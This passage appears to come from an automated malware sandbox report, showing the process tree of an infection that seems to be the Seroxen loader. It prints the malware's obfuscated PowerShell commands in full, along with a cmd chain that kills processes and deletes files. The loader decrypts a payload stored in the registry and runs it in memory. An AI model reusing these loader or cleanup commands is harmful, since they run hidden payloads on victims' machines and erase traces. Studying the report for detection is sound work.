'')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4556
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1932
                                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1136).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:1340
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C cd %systemdrive%\Windows\ & taskkill /F /IM $sxr-powershell.exe & taskkill /F /IM $sxr-nircmd.exe & taskkill /F /IM $sxr-Uni.bat.exe & taskkill /F /IM explorer.exe & ping 127.0.0.1 -n 2 > nul & start explorer.exe & PING localhost -n 8 >NUL & ATTRIB -h -s C:\Windows\$sxr-powershell.exe & ATTRIB -h -s %systemdrive%\Windows\$sxr-seroxen1\$sxr-Uni.bat & del /f C:\Windows\$sxr-powershell.exe & del /f %systemdrive%\Windows\$sxr-seroxen1\$sxr-nircmd.exe & del /f %systemdrive%\Windows\$sxr-seroxen1\$sxr-Uni.bat & rmdir /Q /s %systemdrive%\Windows\$sxr-seroxen1 & rmdir /Q /s "\\?\C:\Windows " & exit
                                                                                                                    5⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    PID:4964
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      6⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:5316
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /F /IM $sxr-powershell.exe
                                                                                                                      6⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:2232
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /F /IM $sxr-nircmd.exe
                                                                                                                      6⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:2984
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /F /IM $sxr-Uni.bat.exe
                                                                                                                      6⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:2036
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /F /IM explorer.exe
                                                                                                                      6⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:716
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      ping 127.0.0.1 -n 2
                                                                                                                      6⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:6072
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      explorer.exe
                                                                                                                      6⤵
                                                                                                                      • Boot or Logon Autostart Execution: Active Setup
                                                                                                                      • Enumerates connected drives
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                      PID:3160
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 3160 -s 5496
                                                                                                                        7⤵
                                                                                                                          PID:5632
                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                        PING localhost -n 8
                                                                                                                        6⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:2216
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        ATTRIB -h -s C:\Windows\$sxr-powershell.exe
                                                                                                                        6⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5752
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        ATTRIB -h -s C:\Windows\$sxr-seroxen1\$sxr-Uni.bat
                                                                                                                        6⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:5832
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                    4⤵
                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                    PID:5752
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      5⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:5720
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      PING localhost -n 8
                                                                                                                      5⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:5728
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                      5⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5292
                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                      ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
                                                                                                                      5⤵
                                                                                                                      • Views/modifies file attributes
                                                                                                                      PID:5632
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                              1⤵
                                                                                                                PID:3820
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3104
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4172
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                  1⤵
                                                                                                                    PID:4368
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                    1⤵
                                                                                                                      PID:4868
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                      1⤵
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:1660
                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                      1⤵
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:3768
                                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:4736
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                        1⤵
                                                                                                                          PID:2788
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                          1⤵
                                                                                                                            PID:3152
                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                            1⤵
                                                                                                                              PID:3100
                                                                                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                              1⤵
                                                                                                                                PID:2240
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                1⤵
                                                                                                                                  PID:4592
                                                                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                  C:\Windows\System32\WaaSMedicAgent.exe 36db7855cbccf2dac8db2cfcc96fbde8 oo1rny+JK0qbXVCi2Jc2GQ.0.1.0.0.0
                                                                                                                                  1⤵
                                                                                                                                    PID:1852
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      2⤵
                                                                                                                                        PID:4044
